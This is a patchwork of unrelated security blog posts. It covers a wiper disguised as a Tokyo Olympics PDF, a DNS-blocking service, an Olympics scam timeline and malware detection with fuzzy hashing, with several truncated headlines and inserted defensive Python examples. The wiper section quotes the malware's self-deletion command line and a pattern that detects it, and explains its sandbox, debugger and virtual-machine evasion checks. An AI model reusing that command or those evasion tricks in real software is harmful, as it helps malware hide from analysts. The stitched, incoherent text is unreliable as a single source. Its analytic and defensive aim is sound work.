A new report said the Solarmarker campaign is being conducted by “fairly sophisticated” actors focusing their energy on credential and residual information theft.

JavaScript Loaded by Malware From Blocked Domains

A new card stealer malware campaign that loads JavaScript malware from blocked domain lists to evade detection is targeting e-commerce sites that run Adobe’s Magento, software security firm Sucuri reports.



Major sporting events, like the World Cup or the Olympics, are usually targets of cybercriminals that take advantage of the event’s popularity. During the 2018 World Cup, for example, an infected document disguised as a “game prediction” delivered malware that stole sensitive data from its victims, including keystrokes and screenshots.

A new malware threat emerged just before the 2020 Tokyo Olympics opening ceremony, able to damage an infected system by wiping its files. The malware disguises itself as a PDF document containing information about cyber attacks associated with the Tokyo Olympics. The wiper component deletes documents created using Ichitaro, a popular word processor in Japan. This wiper is much simpler than “Olympic Destroyer”, which was used to target the 2018 Winter Olympics.


The file was circulated under the name “【至急】東京オリンピック開催に伴うサイバー攻撃等発生に関する被害報告について”, which translates into “[Urgent] About damage reports regarding the occurrence of cyber attacks, etc. associated with the Tokyo Olympics”.

[Screenshot: Malware name]

The file is packed with UPX and was apparently compiled on “2021-07-19” at “22:52:05”. Although a compile timestamp can’t be treated as 100% reliable, this date is just one day before the file’s first public appearance.

[Screenshot: Details about the malware executable]

The developer included a lot of anti-analysis and anti-debugging techniques. The first one is a simple trick that detects if the file is being executed in a sandbox by using the APIs GetTickCount64 and Sleep.

First, the malware reads the current tick count with GetTickCount64 and then sleeps for 16 seconds. Then it calls GetTickCount64 again and checks how much time really elapsed inside the Sleep call. If the elapsed time is below 16 seconds, the malware exits, since the Sleep call was most likely shortened by a sandbox environment.

[Screenshot: Common anti-analysis technique]

If the sandbox environment wasn’t detected at this point, the malware checks if there are any analysis tools by listing all the processes running in the OS and comparing against known tools, such as “wireshark.exe” or “idaq64.exe”.

The strings related to these processes are all encrypted inside the binary, and can be easily decrypted using a simple bitwise operation:

[Screenshot: Decrypting a string from the wiper using Python]

Using the same logic, we’ve created a script to extract and decrypt all the strings automatically, revealing important behavior from the malware:

[Screenshot: Some of the decrypted strings from the malware]
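The bulk string-decryption step described above, as an added example that is not the write-up’s own script. The page only says the strings are recovered with “a simple bitwise operation”, so this code assumes a single-byte XOR key; the blob it decrypts is constructed here (the two process names come from the write-up, the key and layout are arbitrary). It also shows how to recover an unknown single-byte key by brute force when one expected plaintext, such as an analysis-tool process name, is known.

```python
"""Bulk extraction of single-byte-XOR-obfuscated strings from a binary blob.
Added example: the wiper's real key and encoding routine are not given on the
page, so a one-byte XOR key is assumed, and the blob below is constructed."""
import re
from typing import List, Optional


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply a single-byte XOR key to every byte (the operation is its own inverse)."""
    return bytes(b ^ key for b in data)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable-ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def decrypt_strings(blob: bytes, key: int, min_len: int = 4) -> List[str]:
    """Decrypt the whole blob with the key, then harvest the readable runs."""
    return extract_strings(xor_bytes(blob, key), min_len)


def guess_key(blob: bytes, known_plaintext: str) -> Optional[int]:
    """Brute-force the 256 possible keys until a string we expect to be present
    (for example an analysis-tool process name) shows up in the decrypted output."""
    needle = known_plaintext.encode("ascii")
    for key in range(256):
        if needle in xor_bytes(blob, key):
            return key
    return None


def build_sample_blob(key: int, strings: List[str], junk: bytes = b"\x90\xfe") -> bytes:
    """Constructed stand-in for the binary: encrypted, NUL-terminated strings
    separated by junk bytes that decrypt to non-printable values."""
    out = bytearray()
    for s in strings:
        out += junk
        out += xor_bytes(s.encode("ascii") + b"\x00", key)
    out += junk
    return bytes(out)


# Constructed sample data: the two process names are quoted in the write-up,
# the key is arbitrary.
SAMPLE_KEY = 0x2A
SAMPLE_STRINGS = ["wireshark.exe", "idaq64.exe", "cmd.exe /C ping -n 1 -w 3000 > Nul"]
SAMPLE_BLOB = build_sample_blob(SAMPLE_KEY, SAMPLE_STRINGS)

if __name__ == "__main__":
    key = guess_key(SAMPLE_BLOB, "wireshark.exe")
    print(f"recovered key: {key:#04x}")
    for s in decrypt_strings(SAMPLE_BLOB, key):
        print(" ", s)
```

On a real sample the blob would be the data section carved out of the unpacked executable, and the decrypted list is what you feed into a tool-name or command-line indicator table; a plain `strings` run over the raw blob shows none of the names, which is the whole point of the obfuscation.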

Another interesting technique this malware uses to check whether it is being debugged is looking for software breakpoints. For those not familiar with what happens “under the hood” when you set a software breakpoint: in summary, the debugger replaces the byte at the address where you want to break with the one-byte instruction int3, represented by the opcode 0xCC. When the processor reaches this instruction, the program stops and control is transferred back to the debugger, which restores the original byte.

Thus, this malware checks for the presence of the int3 instruction in the entry point of certain functions, by comparing the byte with 0xCC.

[Screenshot: Malware searching for software breakpoints]

We also found verifications for other instructions aside from int3, such as call and jmp, demonstrating that the developer went even further to verify modifications in the original code.

Later, the malware also checks if the process is being debugged through the APIs IsDebuggerPresent and CheckRemoteDebuggerPresent. 

Also, the threat verifies whether the environment is running under a virtual machine by checking the I/O port implemented by the VMware hypervisor.

[Screenshot: Malware checking if the process is running under VMware]

If any sandbox, virtual machine, or analysis tools are detected, the malware calls a function that executes a command line that deletes itself.

cmd.exe /C ping -n 1 -w 3000 > Nul & Del /f /q "C:/Users/username/Desktop/wiper.exe"

[Screenshot: Malware deleting itself after detecting a memory breakpoint]
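The delayed self-deletion command line shown above is a useful detection point in process-creation telemetry (the cmd.exe child, its command line and its parent image). The following is an added example, not Netskope’s detection logic: it parses that pattern, extracts the file being deleted and reports whether the target is the parent process’s own executable. The event schema (pid, image, parent_image, command_line) and the sample events are constructed for the example.

```python
"""Flag the delayed self-deletion command line seen in the write-up in
process-creation events. Added example with a constructed event schema."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# cmd.exe /C ping -n 1 -w <ms> > Nul & del /f /q "<path>"
# The ping against nothing in particular only serves as a sleep, so the
# parent process has time to exit before its file is removed.
SELF_DELETE_RE = re.compile(
    r"cmd(?:\.exe)?\s+/c\s+ping\s+-n\s+\d+\s+-w\s+(?P<wait>\d+)\s*>\s*nul\s*&\s*"
    r"del\s+(?:/[fq]\s+)*[\"']?(?P<target>[^\"']+?)[\"']?\s*$",
    re.IGNORECASE,
)


@dataclass
class Finding:
    pid: int
    parent_image: str
    target: str
    wait_ms: int
    self_delete: bool  # True when the parent deletes its own executable


def normalize_path(path: str) -> str:
    """Compare paths case-insensitively and regardless of slash direction."""
    return path.strip().replace("/", "\\").lower()


def check_event(event: Dict) -> Optional[Finding]:
    """Return a Finding when the command line matches the delayed-delete pattern."""
    match = SELF_DELETE_RE.search(event["command_line"])
    if not match:
        return None
    target = match.group("target").strip()
    return Finding(
        pid=event["pid"],
        parent_image=event["parent_image"],
        target=target,
        wait_ms=int(match.group("wait")),
        self_delete=normalize_path(target) == normalize_path(event["parent_image"]),
    )


def scan_events(events: List[Dict]) -> List[Finding]:
    return [f for f in (check_event(e) for e in events) if f is not None]


# Constructed process-creation events; the first command line is the one
# quoted in the write-up, the others are invented for contrast.
SAMPLE_EVENTS = [
    {   # the wiper spawning cmd.exe to delete itself
        "pid": 4120, "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Users\username\Desktop\wiper.exe",
        "command_line": 'cmd.exe /C ping -n 1 -w 3000 > Nul & Del /f /q "C:/Users/username/Desktop/wiper.exe"',
    },
    {   # benign connectivity check, no delete
        "pid": 4188, "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "cmd.exe /C ping -n 4 127.0.0.1",
    },
    {   # same delayed-delete idiom aimed at another file: worth a look, not self-deletion
        "pid": 4203, "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Tools\cleanup.exe",
        "command_line": r"cmd /c ping -n 1 -w 2000 > nul & del /q C:\Temp\old.log",
    },
]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(finding)
```

The `self_delete` flag is what separates a malware clean-up from the many legitimate installers and updaters that use the same ping-then-del idiom on other files, so a rule built on this should alert on the self-deletion case and only log the rest.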

Despite all these anti-analysis and anti-debugging tricks, the only goal of the malware is to run a sequence of commands that searches and deletes files with specific extensions:

[Screenshot: Commands executed by the malware to delete files]

While these commands are being executed, the malware also tries to run the “curl” program to request a pornographic website, likely to mislead forensic analysis of the machine.


Netskope Threat Labs is actively monitoring this campaign and has ensured coverage for all known threat indicators and payloads. 

Netskope Threat Protection
Trojan.GenericKD.46658860
Trojan.GenericKD.37252721
Trojan.GenericKD.46666779
Gen:Variant.Razy.861585

Netskope Advanced Threat Protection provides proactive coverage against this threat.
Gen.Malware.Detect.By.StHeur indicates a sample that was detected using static analysis
Gen.Malware.Detect.By.Sandbox indicates a sample that was detected by our cloud sandbox

Sample Hashes






The post Netskope Threat Coverage: 2020 Tokyo Olympics Wiper Malware appeared first on Netskope.







More than 120 messages caught trying to filch credentials from customers of USAA Bank, Microsoft

Between July 13 and July 16, someone took over the Mailgun account owned by restaurant chain Chipotle Mexican Grill and placed an order for login credentials using misappropriated marketing messages.…


U.S. State, Local, Tribal, and Territorial (SLTT) government organizations, schools, and hospitals are becoming increasingly reliant on technology. The Center for Internet Security’s (CIS’s) Malicious Domain Blocking and Reporting (MDBR) service has been protecting these entities from being targets of ransomware, malware, and phishing attacks. One year since its inception in July 2020, MDBR has blocked more than 1.5 billion requests to known bad web domains for public sector organizations.

Ransomware, Phishing, Malware: Small Actions for Mighty Returns

SLTT organizations house massive amounts of personal information including social security numbers, employee, patient, or student records, and billing information. It makes them prime targets for cyber-attacks as the payoff for this information is far greater than other stolen data such as credit card numbers.

What makes cyber-attacks successful is that a majority of them start with small actions: a phishing email, or a fake website URL that downloads malware onto a computer. For example, malware most commonly finds its way into SLTT organizations through either malspam (unsolicited emails that direct users to malicious websites or trick them into downloading or opening malware) or malvertisements (malware introduced through malicious advertisements). If the targeted user takes the bait, an attacker can gain access to an entire database.

The 2020 Verizon Data Breach Investigations Report (DBIR) found that ransomware disproportionately affects the public sector (more than 60% of malware incidents vs. 27% of malware in all sectors).

For governments, hospitals, and schools this could mean public records being stolen, or worse, a full shut down of the institution itself until the money is paid.

Malicious Domain Blocking and Reporting (MDBR)

Protecting against these common types of attacks can be costly and time-consuming. The MDBR service from CIS is available at no cost to all U.S. SLTT organizations, as well as all public and private hospitals in the U.S., in partnership with technology provider Akamai.

MDBR technology prevents IT systems from connecting to harmful web domains, helping limit infections related to known malware, ransomware, phishing, and other cyber threats. This capability can block the vast majority of ransomware infections just by preventing the initial outreach to a ransomware delivery domain.

How MDBR Works:

MDBR proactively blocks network traffic from an organization to known harmful web domains, helping protect IT systems against cybersecurity threats. Once an organization points its domain name system (DNS) requests to Akamai’s DNS server IP addresses, every DNS lookup is compared against a list of known and suspected malicious domains. Attempts to access known malicious domains, such as those associated with malware, phishing, and ransomware, among other threats, are blocked and logged. CIS then provides reporting that includes log information for all blocked requests and assists in remediation if needed.
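To make the lookup-compare-block-log flow concrete, here is an added example of a protective DNS sieve; it is not CIS or Akamai code, and the service’s real blocklist format, response behaviour and report layout are not described on this page, so the category-tagged blocklist, the client/query pairs (RFC 2606 example domains) and the report structure are all constructed assumptions. The one design point it illustrates is that a blocked zone must also cover its subdomains.

```python
"""Toy protective-DNS policy in the style described for MDBR: every lookup is
compared against a blocklist, hits are blocked and logged, and a summary
report is produced. Added example with constructed data structures."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class LogEntry:
    client: str
    qname: str
    action: str  # "ALLOW" or "BLOCK"
    category: Optional[str]


class DomainBlocklist:
    """Maps blocked zones to a threat category; subdomains inherit the block."""

    def __init__(self, entries: Dict[str, str]):
        self._entries = {self._norm(d): c for d, c in entries.items()}

    @staticmethod
    def _norm(name: str) -> str:
        # DNS names are case-insensitive and may carry a trailing root dot.
        return name.strip().rstrip(".").lower()

    def lookup(self, qname: str) -> Optional[str]:
        labels = self._norm(qname).split(".")
        # Walk from the full name up through its parent zones, so that
        # cdn.malware.example.net is caught by an entry for malware.example.net.
        for i in range(len(labels)):
            category = self._entries.get(".".join(labels[i:]))
            if category:
                return category
        return None


def apply_policy(blocklist: DomainBlocklist,
                 queries: List[Tuple[str, str]]) -> Tuple[List[LogEntry], Counter]:
    """Decide each query, keep a log, and count blocked requests per category."""
    log: List[LogEntry] = []
    report: Counter = Counter()
    for client, qname in queries:
        category = blocklist.lookup(qname)
        if category:
            log.append(LogEntry(client, qname, "BLOCK", category))
            report[category] += 1
        else:
            log.append(LogEntry(client, qname, "ALLOW", None))
    return log, report


# Constructed blocklist and query stream (reserved example domains only).
SAMPLE_BLOCKLIST = {
    "malware.example.net": "malware",
    "phish.example.org": "phishing",
    "ransom-c2.example.com": "ransomware",
}
SAMPLE_QUERIES = [
    ("10.0.0.11", "www.example.com"),
    ("10.0.0.11", "cdn.malware.example.net."),  # subdomain of a blocked zone
    ("10.0.0.12", "LOGIN.PHISH.EXAMPLE.ORG"),   # case must not matter
    ("10.0.0.13", "updates.example.org"),
    ("10.0.0.13", "ransom-c2.example.com"),
]

if __name__ == "__main__":
    entries, summary = apply_policy(DomainBlocklist(SAMPLE_BLOCKLIST), SAMPLE_QUERIES)
    for entry in entries:
        if entry.action == "BLOCK":
            print(f"{entry.client} -> {entry.qname}: blocked ({entry.category})")
    print("blocked per category:", dict(summary))
```

The per-client block log is the part that matters operationally: a workstation repeatedly resolving a ransomware delivery domain is a host to isolate and investigate, not just a statistic.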

Learn how MDBR shields organizations from cyber threats by watching our short video:

MDBR Expands Its Reach

MDBR was initially released to SLTT government entities at no cost in July 2020. Based on its early success in protecting these organizations, the service was expanded to serve public and private hospitals as well as K-12 schools.

At the end of May 2021, MDBR had received 222.4 billion DNS requests and blocked more than 1.5 billion of those requests to known bad web domains for public sector members. This represents 1.5 billion potential malware or ransomware infections that could have impacted these organizations.

Malware and phishing were the main types of attacks making up 72% of the domains blocked by MDBR for SLTTs in the last 12 months.

Adoption of this service continues to grow as the service can be implemented within 15 minutes or less and requires virtually no maintenance as CIS and Akamai fully maintain the systems required.

The post MDBR Stops Ransomware, Phishing, Malware, and More appeared first on CIS.


The 2020 Olympics are, after a bit of a delayed start, officially in full swing. So too is the possibility for scammers to crawl out of the woodwork. And while actual, measurable cyberattacks and hacks surrounding the Olympics did not truly get rolling until 2008 in Beijing, the Olympic Games have traditionally been quite the target for malicious acts of all kinds, dating back years. Shall we take a look?

1996 Atlanta

No sign of cyberattacks yet. A disaster is alluded to, but the disaster in question is down to slow websites for surfers, and faulty data transmission at the event itself. People getting up to mischief? Not so much.

2000 Sydney

You may (or may not!) remember Sydney being referred to as “The Internet Olympics”. It was also the first major Olympics event where organizers braced for hacking related impact. I recall quite a lot of articles at the time predicting all manner of doom and gloom scenarios. I’m sure Y2K bug fever didn’t help douse the fires of suspicion that things were about to go awry.

As it turns out, things did not go awry. Non-hacked games were enjoyed by all. Phew.

2002 Salt Lake City

By the time of the 2002 Olympics, experts responsible for locking down the winter event were in good spirits. Nothing happened at the 2000 games, and it seems nothing happened at any earlier events either. Once again, the primary concern outside security was reliability and hoping massively complex networks wouldn’t fall over during the games proper.

2004 Athens

The most interesting cyber story in the build up to the 2004 games was an infamous wiretapping incident in Athens. Some folks maintain there’s a strong possibility it was designed to grab all manner of calls from VIPs during the games. We’ll almost certainly never know for sure.

2006 Turin

This is spectacular (and you really should click, because it’s hard to put into words what is on view here). As you can see, things still aren’t really all that cyber in Olympics land. That’s about to change, however…

2008 Beijing

The Beijing Olympics are notable for what may be the first real slice of cyberattacks aimed at the games. The former Chief Executive of the British Olympic Association feared they’d been compromised. A number of sports-related organizations, including various National Olympic Committees, the World Anti-Doping Agency, and the International Olympic Committee, were all targeted by “Operation Shady Rat,” according to McAfee. While unrelated organizations were also targeted over a five-year period, this definitely isn’t what anybody needs prior to an Olympic games.

An article from the time claims the “English language version” of the Olympics site was apparently compromised and redirected to some sort of loan company portal. However, there are so many official and unofficial sites from the time, it’s difficult to say what exactly that site is. Is it a fan site? A real portal? Did the article typo the URL? I’m not sure, and I can’t find it being mentioned anywhere else. We’re on less shaky ground with this tale of banner color alteration, in which it was claimed that color alterations made to a website were purposeful hacks meant to highlight human rights abuses.

There’s also an incredibly comprehensive run-down of hack-related happenings during the 2008 games here. In just two years, we’ve gone from “not much happening here, is there?” to “RED ALERT, THIS IS NOT A DRILL”. Fake ticket websites, bogus streams, websites belonging to athletes hacked, site defacements, and more.

Away from the official games content itself, people were targeted by other means. All of a sudden we have infectious email attachments, and compromised third-party sites serving up malware. Wherever you looked, there was a threat sprinting into view.

Hacking may have been slow off the blocks, but it was definitely an unofficial event by this point.

2010 Vancouver

I couldn’t really find much for the Vancouver Winter Olympics. The most interesting incident was probably a fake opening ceremonies website serving infections, via promotion from a bogus Twitter account. Not spectacular by any means, but one of the first examples of using Twitter as a jumping-off point for attacks during a major event.

2012 London

The London Olympics—the one where James Bond and the definitely real Queen jumped out of a helicopter—was a massive splash of malicious activity in internet terms.

By this point, security drills and planning were a major component of the games. I seem to recall reading about Canada doing extensive testing in the build-up to Vancouver, and simulated attacks detailed here were probably building on those efforts. According to that article, China was “subject to about 12 million online attacks per day” during the 2008 games. War-gaming and using “an in-house team of pretend hackers,” as they put it, makes a lot of sense.

Articles warning of dangers mainly focused on search engine poisoning (still a threat back in 2012), fake sites, streaming, and once again Twitter makes an appearance as “one to watch.” There’s also the occasional warning about dubious Wi-Fi hotspots.

In terms of actual attacks which took place, we see the rise of mobile as a way in for Olympics scams. Russian sites hosted Trojans claiming to be official 2012 game apps. Yes, games thrown into the mix alongside mobile. What a combo! Email spam promising free airline tickets to see the games is a timeless social media scam also repackaged for this sporting event. Here, you’d get nothing but survey scams.

Elsewhere, there were threats to power supplies made prior to the opening ceremony. There was also this frankly incredible tale of traffic lights, in which Vanity Fair reported that London manipulated its own traffic light system to change any red lights to green lights for officials who were scouting the city for the initial Olympic bidding process. We’ll save the best for last, and by best I do of course mean worst—an opening ceremony conspiracy theory claiming to foreshadow COVID-19. Because hey, why not.

2014 Sochi

The “You’re definitely going to be hacked in Russia” framing went into a bit of overdrive during the build up to these particular games. Indeed, that specific story regarding how easy it was to be compromised in Sochi drew a fair amount of heat.

Even much more reserved commentary pieces labelled it a “cyber war zone.” Which is interesting, because the real fireworks would arrive at later events.

2016 Rio de Janeiro

The Rio Olympics had their now traditional opening ceremony of “here come the scams.” We can see clear patterns developing over time as scammers dust off their tried and tested sporting fakeouts.

Fake tickets and lottery winnings start doing their thing. So, too, do fake ticket sites, TV promotions, and even something offering world champion status in the “amorous olympics”! Phishing and bogus domains remained a strong contender for taking the scammer gold medal, with ATM carding grabbing a runner-up spot.

Ransomware put in a less than sporting appearance, via a compromised federation website. The RIG exploit kit was also lying in wait for anyone searching for Rio cake instructions—as in the actual baked dessert—which I must admit, I didn’t see coming.

All things banking are considered a problem point in Brazil in terms of hacks and malware, so there were plenty of warnings for visitors surrounding that too. You’ll notice alongside the mainstay threats there are some new additions beginning to seep in. New techniques and tactics will continue to emerge as we move from event to event. We’ll finish off with 2016 by linking to Anonymous branded attempts to highlight the less entertaining activities happening off camera.

2018 Pyeongchang

A strong start for Team Cybercriminal as they deployed “Olympic Destroyer,” whose name is if nothing else incredibly accurate as a mission statement. After various threats down the years to interfere with the opening ceremony, the bad people finally got their wish and caused chaos.

We take a quick dip back into mobile land, as more bad apps roll into action. In this case, one app claimed to be a livestream application showing highlights. In reality, the app crashed a lot but displayed a tireless ability to pop adverts without fail.

We round this brief summary off with a worrying slice of alleged nation state attack. US officials claimed that Russian spies compromised multiple computers, and made it look as though North Korea was responsible.

Actually, no. We’ll end this summary with a bit of an epilogue to the games, some months after it had taken place. A very nasty attack there, in which Russian hackers were accused of leaking the private medical information of US Olympians Simone Biles and Venus and Serena Williams, in a reported attempt to downplay the severity of Russia’s involvement in an Olympic doping scandal.

2020 Tokyo

And now we come to the current games held in Japan. Things began early, with Twitter account compromises in February. Picking up where we left off last time, state-backed attacks from Russia were planned before the games were postponed due to the pandemic. We’ve now got the traditional alarms being sounded, but it remains to be seen where the big hits hammer home. There is evidence of malware bouncing around though, in the form of Wiper malware targeting Japanese computers.

What we can say is that law enforcement are also ringing the big “please be careful” bell. The FBI put out a warning a week ago, and sure enough, a small leak has already taken place.

People should ensure they’re running the latest version of their operating system, their security software is up to date, and think very carefully where offers, freebies, discounts, streaming, mobile apps, or too-good-to-be-true emails are concerned.

These are tried and tested methods for Olympics scammers, and they’re becoming very good at it. Let’s see if we can make them come in last place for a change.

The post The Olympics: a timeline of scams, hacks, and malware appeared first on Malwarebytes Labs.


RiskIQ’s research team leverages our Internet Intelligence Graph to analyze known campaigns of widely used malware families to fingerprint trends in malicious infrastructure. We recently continued our analysis of Agent Tesla, leading us to identify the XAMPP web server solutions stack being used to serve Agent Tesla and Formbook malware. 

This latest analysis shines new light on the Agent Tesla ecosystem, the TTPs its operatives are using, and how RiskIQ users can now leverage the XAMPP web component to identify hosts that distribute malware and research other potentially malicious infrastructure. 


You can’t control the weather. But you can safeguard your downstream infrastructure investment.

Today’s cybersecurity threats continue to find ways to fly and stay under the radar. Cybercriminals use polymorphic malware because a slight change in the binary code or script could allow the said threats to avoid detection by traditional antivirus software. Threat actors customize their wares specific to their target organizations to increase their chances of breaking into and moving laterally through an entire corporate network, exfiltrating data, and leaving with little or no trace. The underground economy is rife with malware builders, Trojanized versions of legitimate applications, and other tools and services that allow malware operators to deploy highly evasive malware.

As the number of threats seen in the wild continues to increase exponentially, the continued evolution and innovation of their evasion tactics create a scenario where most malware is seen only once. Therefore, in today’s threat landscape, security solutions should no longer be just about the number of unique malware they can detect. Instead, they should deliver durable solutions that can defend against existing as well as future attacks. This requires comprehensive visibility into threats, coupled with the ability to process vast amounts of data. Microsoft 365 Defender provides such a capability using its cross-domain optics and the transformation of data into actionable security information through innovative applications of AI and machine learning methodologies.

We have previously discussed how we apply deep learning in detecting malicious PowerShell, exploring new approaches to classify malware, and in detecting threats via the fusion of behavior signals. In this blog post, we discuss a new approach that combines deep learning with fuzzy hashing. This approach utilizes fuzzy hashes as input to identify similarities among files and to determine if a sample is malicious or not. Then, a deep learning methodology inspired by natural language processing (NLP) better identifies similarities that actually matter, thus improving detection quality and scale of deployment.

This model aims to improve the overall accuracy of classifying malware and continue closing the gap between malware release and eventual detection. It can detect and block malware at first sight, a critical capability in defending against the wide range of threats, including sophisticated cyberattacks.

Case study: New NOBELIUM-related malware blocked at first sight

In March this year, Microsoft 365 Defender successfully blocked a file that would later be confirmed as a variant of the GoldMax malware. GoldMax, a command-and-control backdoor that persists on networks as a scheduled task impersonating systems management software, is part of the tools, tactics, and procedures (TTPs) of NOBELIUM, the threat actor behind the attacks against SolarWinds in December 2020.

Microsoft was able to proactively defend its customers from this newly discovered GoldMax variant because it leveraged two main technologies: fuzzy hashing, which serves as the input, and deep learning techniques inspired by NLP and computer vision, among others.

The earliest GoldMax sample, which Microsoft detects as Trojan:Win64/GoldMax.A!dha, was first submitted to VirusTotal in September 2020. While the new file was confirmed to be a GoldMax variant in June 2021, or three months after Microsoft first blocked it, we started defending customers as soon as we saw it. As seen in the screenshots below, the new file’s TLSH and SSDEEP hashes—the fuzzy hashes exposed on VirusTotal—are observably similar to those of the first GoldMax variant. Both files also have the same ImpHash and file size, further supporting our initial conclusion that the second file is also part of the GoldMax family.


Figure 1. File properties of the first GoldMax variant (top) and the new file detected in March (bottom) (from VirusTotal)

In the next sections, we discuss fuzzy hashes and how we use them in conjunction with deep learning to detect new and unknown threats.

Understanding fuzzy hashes

Hashing has become an essential technique in malware research literature and beyond because its output—hashes—are commonly used as checksums or unique identifiers. For example, it is common practice to use SHA-256 cryptographic hash to query a knowledge database like VirusTotal to determine whether a file is malicious or not. The first antivirus products operated this way before antivirus signatures existed.

However, to identify or detect similar malware, traditional cryptographic hashing poses a challenge because of its inherent property called cryptographic diffusion, whose purpose is to hide the relationship between the original entity and the hash so that these are still considered one-way functions. With this property, even a minimal change in the original entity—in this case, a file—yields a radically different, undetected hash.

Below are screenshots that illustrate this principle. The word change in the text file and the resulting change in the MD5 hash represent the effect of changes in binary content of other files:


Figure 2. Example of cryptographic hashing

Fuzzy hashing breaks the aforementioned cryptographic diffusion while still hiding the relationship between entity and hash. In doing so, this method provides similar resulting hashes when given similar inputs. Fuzzy hashing is the key to finding new malware that looks like something we have seen previously.

Like cryptographic hashes, there are several algorithms to calculate a fuzzy hash. Some examples are Nilsimsa, TLSH, SSDEEP, or sdhash. Using the previous text files example, below is a screenshot of their SSDEEP hashes. Note how observably similar these hashes are because there is only a one-word difference in the text:


Figure 3. Example of fuzzy hashing

The main benefit of fuzzy hashes is similarity. Since these hashes can be calculated on several parts or the entirety of a file, we can focus on hash sequences that are like one another. This is important in determining the maliciousness of a previously undetected file and in categorizing malware according to type, family, malicious behavior, or even related threat actor.
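The contrast drawn in the last few paragraphs (cryptographic diffusion versus similarity-preserving hashing) can be reproduced without screenshots. The block below is an added example, not Microsoft’s code and not ssdeep or TLSH: it measures how many bits of SHA-256 change after a one-word edit, then computes a deliberately small context-triggered piecewise hash (the idea behind ssdeep, here reduced to a rolling window trigger plus one FNV-1a character per block) and scores two signatures by edit distance. The three text samples are constructed for the example; the scoring scale and block size are arbitrary choices.

```python
"""Cryptographic diffusion vs. a similarity-preserving (fuzzy) digest.
Added example: a toy context-triggered piecewise hash, not ssdeep/TLSH."""
import hashlib

FNV_OFFSET, FNV_PRIME = 0x811C9DC5, 0x01000193
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"


def hamming_bits(a: bytes, b: bytes) -> int:
    """Number of differing bits between two equal-length digests."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def ctph(data: bytes, window: int = 7, block_size: int = 16) -> str:
    """Toy context-triggered piecewise hash. A hash of the last `window` bytes
    decides where a block ends, so block boundaries depend only on local
    content and re-synchronise shortly after an edit. Each block is reduced
    to one character, so similar inputs share most of their signature."""
    sig = []
    block_hash = FNV_OFFSET
    for i, byte in enumerate(data):
        block_hash = ((block_hash ^ byte) * FNV_PRIME) & 0xFFFFFFFF
        trigger = sum(data[max(0, i - window + 1): i + 1])
        if trigger % block_size == block_size - 1:
            sig.append(ALPHABET[block_hash & 63])
            block_hash = FNV_OFFSET
    if block_hash != FNV_OFFSET:  # flush the trailing partial block
        sig.append(ALPHABET[block_hash & 63])
    return "".join(sig)


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance; ssdeep scores signatures the same way."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def similarity(sig_a: str, sig_b: str) -> int:
    """0..100 score; 100 means identical signatures."""
    longest = max(len(sig_a), len(sig_b), 1)
    return round(100 * (1 - levenshtein(sig_a, sig_b) / longest))


def compare(a: bytes, b: bytes) -> dict:
    sha_a, sha_b = hashlib.sha256(a).digest(), hashlib.sha256(b).digest()
    return {
        "sha256_bits_differ": hamming_bits(sha_a, sha_b),  # ~128 of 256 expected
        "fuzzy_a": ctph(a),
        "fuzzy_b": ctph(b),
        "fuzzy_similarity": similarity(ctph(a), ctph(b)),
    }


# Constructed samples: TEXT_B is TEXT_A with one word changed, TEXT_C is unrelated.
TEXT_A = (
    b"Analysis notes, constructed for this example. The sample arrived as a packed "
    b"executable that presented itself as a PDF report about incidents during the "
    b"games. In the sandbox it measured how long a sixteen second sleep really took, "
    b"listed running processes and compared them with a decrypted table of analysis "
    b"tools, inspected function entry points for breakpoint opcodes, queried the "
    b"debugger flags and probed the hypervisor I/O port. When nothing suspicious was "
    b"found it walked the user profile and removed documents with the targeted "
    b"extensions, while a decoy web request was issued to muddy the timeline."
)
TEXT_B = TEXT_A.replace(b"sixteen second sleep", b"sixteen second pause")
TEXT_C = (
    b"Reference material, also constructed. A fuzzy hash splits its input into "
    b"pieces at content-defined boundaries and summarises each piece separately, "
    b"so a local edit only disturbs the summaries of the pieces around it. The "
    b"signatures of two related files therefore share long common runs, which an "
    b"edit-distance score turns into a number that a classifier can consume."
)

if __name__ == "__main__":
    print("near-identical:", compare(TEXT_A, TEXT_B))
    print("unrelated     :", compare(TEXT_A, TEXT_C))
```

Expect roughly half of the 256 SHA-256 bits to flip for the one-word edit while the fuzzy signatures stay almost identical, and the unrelated text to score low on both. The short signature is also why the later sections can treat runs of signature characters as “words”: nearby characters describe nearby regions of the file.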

Fuzzy hashes as “natural language” for deep learning

Deep learning in its many applications has recently been remarkable at modeling natural human language. For example, convolutional architectures, recurrent architectures like Gated Recurrent Units (GRUs) or Long Short Term Memory networks (LSTMs), and most recently attention-based networks like all the variants of Transformers have proven to be state-of-the-art in tackling human language tasks like sentiment analysis, question answering, or machine translation. As such, we explored whether similar techniques can be applied to computer languages like binary code, with fuzzy hashing as an intermediate step to reduce the sequence complexity and length of the original space. We discovered that segments of fuzzy hashes could be treated as “words,” and some sequences of such words could indicate maliciousness.

Architecture overview and deployment at scale

A common deep learning approach in dealing with words is to use word embeddings. However, because fuzzy hashes are not exactly natural language, we could not simply use pre-trained models. Instead, we needed to train our embeddings from scratch to identify malicious indicators.

With these embeddings in hand, we tried most of the things one would do with a language deep neural network. We explored different architectures using standard techniques from the literature: convolutions over these embeddings, multilayer perceptrons, traditional sequential models (like the previously mentioned LSTM and GRU), and attention-based networks (Transformers).


Figure 4. Architecture overview of the deep learning model using fuzzy hashes

